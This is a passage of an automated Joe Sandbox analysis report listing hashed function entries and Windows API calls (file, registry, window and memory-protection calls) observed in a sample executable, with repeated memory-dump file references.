                              • Instruction ID: 95ce1d1531bf95c5b63597d89c485aa35c0d1340a1f9302f4fd982700dd97f71
                              • Opcode Fuzzy Hash: 2cd2218bbcb3a25affaf13f37e61e3901990f1d8df7fbec2e67afc0c61dec3ca
                              • Instruction Fuzzy Hash: 0AF08231705201EBCB20DF659D48A9B7EE8EF91354B10403BE589F6190D6388512CA2C
                              APIs
                              • ShowWindow.USER32(00000000,00000000), ref: 00401E43
                              • EnableWindow.USER32(00000000,00000000), ref: 00401E4E
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Window$EnableShow
                              • String ID:
                              • API String ID: 1136574915-0
                              • Opcode ID: 70a93260b027f2004694904072cd59400e64644bb7532fd21934b6a3ced71637
                              • Instruction ID: f710efbc4c9934798fb848b4930091ab6df2b9d686602449302b85490548aed4
                              • Opcode Fuzzy Hash: 70a93260b027f2004694904072cd59400e64644bb7532fd21934b6a3ced71637
                              • Instruction Fuzzy Hash: C8E01272B082119FD714EBB6EA495AD77B4EF40315B11403BE415F11D1DE7888419F5D
                              APIs
                              • ShowWindow.USER32(00010496), ref: 00401581
                              • ShowWindow.USER32(00010490), ref: 00401596
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: ShowWindow
                              • String ID:
                              • API String ID: 1268545403-0
                              • Opcode ID: 61e2efb783f3023bff3ad6d967f60c2a1a0ca49b5590f8eabca18dd422d604b3
                              • Instruction ID: 0dda4fc35c74e8091563047f6652b1239714b114c1c6f120fbc2b65112c94b6f
                              • Opcode Fuzzy Hash: 61e2efb783f3023bff3ad6d967f60c2a1a0ca49b5590f8eabca18dd422d604b3
                              • Instruction Fuzzy Hash: 62E08672B001159BCB24DF68EDD087E77B5EB84311751053FD902B3290C6B8DD418B58
                              APIs
                              • GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                • Part of subcall function 004063C3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004063DA
                                • Part of subcall function 004063C3: wsprintfA.USER32 ref: 00406413
                                • Part of subcall function 004063C3: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406427
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                              • String ID:
                              • API String ID: 2547128583-0
                              • Opcode ID: 0ad4aa8648104e950424ecb2e9ed5d31610cefc4b667c124e82fedf243554202
                              • Instruction ID: 56fda94a1dd54a43fb122a1991fe363568279dfba8e98efda579274c3b941564
                              • Opcode Fuzzy Hash: 0ad4aa8648104e950424ecb2e9ed5d31610cefc4b667c124e82fedf243554202
                              • Instruction Fuzzy Hash: E3E086326042105AD2106BB09E0487773A89F84750302883EF946F2140D7389C75ABAE
                              APIs
                              • GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\1ppvR5VRT6.exe,80000000,00000003), ref: 00405C36
                              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: File$AttributesCreate
                              • String ID:
                              • API String ID: 415043291-0
                              • Opcode ID: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                              • Instruction ID: 44ec1511c7d75563636feacf23b0872b92cf9f9cc06fc18b7ec6e669f43cef59
                              • Opcode Fuzzy Hash: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                              • Instruction Fuzzy Hash: E4D09E71654201AFEF098F20DE16F2EBAA2EB84B00F11952CB682944E1DA715819AB19
                              APIs
                              • CreateDirectoryA.KERNELBASE(?,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 00405709
                              • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405717
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CreateDirectoryErrorLast
                              • String ID:
                              • API String ID: 1375471231-0
                              • Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                              • Instruction ID: 9e29868ffe2b43b7798ba1daada82999d34952ab2a4b7d437405be2737e00dc4
                              • Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                              • Instruction Fuzzy Hash: 0DC04C30225901DADA606F249F087177994FBA0741F1144396146E30E0EA348415ED2D
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: wsprintf
                              • String ID:
                              • API String ID: 2111968516-0
                              • Opcode ID: 4fda81b7895bfe8bf62350e409a9146a4ce559ffbc9a4be406a98ca21679bf34
                              • Instruction ID: 014ce3e67ccbc0a67955049e33e6e2fc18f0270869ac9b4e1a99f60d8e299e74
                              • Opcode Fuzzy Hash: 4fda81b7895bfe8bf62350e409a9146a4ce559ffbc9a4be406a98ca21679bf34
                              • Instruction Fuzzy Hash: CC21F970D04295BEDF318B699948AAEBF749F11304F04457FE4D0B62D5C6BE8A82CF19
                              APIs
                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A0
                                • Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: FilePointerwsprintf
                              • String ID:
                              • API String ID: 327478801-0
                              • Opcode ID: 7f4dd024d7baea7243aacb1c134d87f0f28e7bae7902d05c041a77775a735631
                              • Instruction ID: daba68e88d81473494fab100d986bdd4d5457abcde4f4dc52411d400b48531e4
                              • Opcode Fuzzy Hash: 7f4dd024d7baea7243aacb1c134d87f0f28e7bae7902d05c041a77775a735631
                              • Instruction Fuzzy Hash: BCE09B71B04116ABD700FB95AA4997E7768DF40304F10403FF515F00C1CA7D4C025B2D
                              APIs
                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232F
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: PrivateProfileStringWrite
                              • String ID:
                              • API String ID: 390214022-0
                              • Opcode ID: d24bdbc1146ceb37acbd80640b4da5ce9412419425c02070d407eaaf5c42416a
                              • Instruction ID: f472a2c509351f333654906e099da5e6dfd11f42980ce41b172c94471a0d1cd1
                              • Opcode Fuzzy Hash: d24bdbc1146ceb37acbd80640b4da5ce9412419425c02070d407eaaf5c42416a
                              • Instruction Fuzzy Hash: 8BE01A31B401246ADB207AB10E8E96E14989BC4744B29053ABE05B62C3DDBC4C414AB9
                              APIs
                              • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B72,00000000,?,?), ref: 00405F76
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                              • Instruction ID: b8b87f9e7f23a22b038ad66cb6348727c8887116b88fbbe418bbf9d15439b9dc
                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                              • Instruction Fuzzy Hash: B4E0E67201450DBEDF095F60DD0AD7B371DEB08304F04452EFA45D4091E7B5AD209E74
                              APIs
                              • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040CB79,0040B8D8,00403246,0040B8D8,0040CB79,004138D8,00004000,?,00000000,00403070,00000004), ref: 00405CED
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                              • Instruction ID: e5327eed263ed0cb59b3772f759b7efddda8826228879d6768eb485b7ec61b42
                              • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                              • Instruction Fuzzy Hash: CEE0EC3225065AABDF509E95AD08FEB7B6CEF053A0F008837F915E2150D631E821DBA8
                              APIs
                              • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138D8,0040B8D8,004032C2,0040A130,0040A130,004031C6,004138D8,00004000,?,00000000,00403070), ref: 00405CBE
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                              • Instruction ID: 86bb3e2151b1fdd0dbac44507bcf00ea7ca2ece369def3772f3446380bdcc129
                              • Opcode Fuzzy Hash: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                              • Instruction Fuzzy Hash: DAE08C3220825EABEF109E508C00EEB3B6CFB00361F144432FD10E7040E230E860ABB4
                              APIs
                              • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002727
                              Memory Dump Source
                              • Source File: 00000005.00000002.96983501688.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                              • Associated: 00000005.00000002.96983452754.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983541203.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983601110.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_10000000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                              • Instruction ID: e09dfa788fffc30199ef0a9f627684cb70e95bce5f527532b7ad3e980fb418b3
                              • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                              • Instruction Fuzzy Hash: 67F09BF19092A0DEF360DF688CC47063FE4E3983D5B03852AE358F6269EB7441448B19
                              APIs
                              • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040236D
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: PrivateProfileString
                              • String ID:
                              • API String ID: 1096422788-0
                              • Opcode ID: e8e9dc98ecc8dc52fd3defedd6371274e224f608b56cf67719823b11c706e596
                              • Instruction ID: 8896498bc3bf22cdd75c41d4cee83ceff5cc5a9cf36b2948d6df5d4522980b60
                              • Opcode Fuzzy Hash: e8e9dc98ecc8dc52fd3defedd6371274e224f608b56cf67719823b11c706e596
                              • Instruction Fuzzy Hash: 82E08634B44308BADF10AFA19D49EAD3668AF41710F14403AFD547B0E2EEB844429B2D
                              APIs
                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405FAD,?,?,?,?,00000002,Call), ref: 00405F43
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Open
                              • String ID:
                              • API String ID: 71445658-0
                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                              • Instruction ID: 49134d8a29c384089d71c2fc87a48e1db8574b6415c3e00dd087e3758e4bfdf5
                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                              • Instruction Fuzzy Hash: C1D0EC3210420ABADF119E919D01FAB371DEB04350F004426BA45E4091D779D520AE54
                              APIs
                              • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                              Memory Dump Source
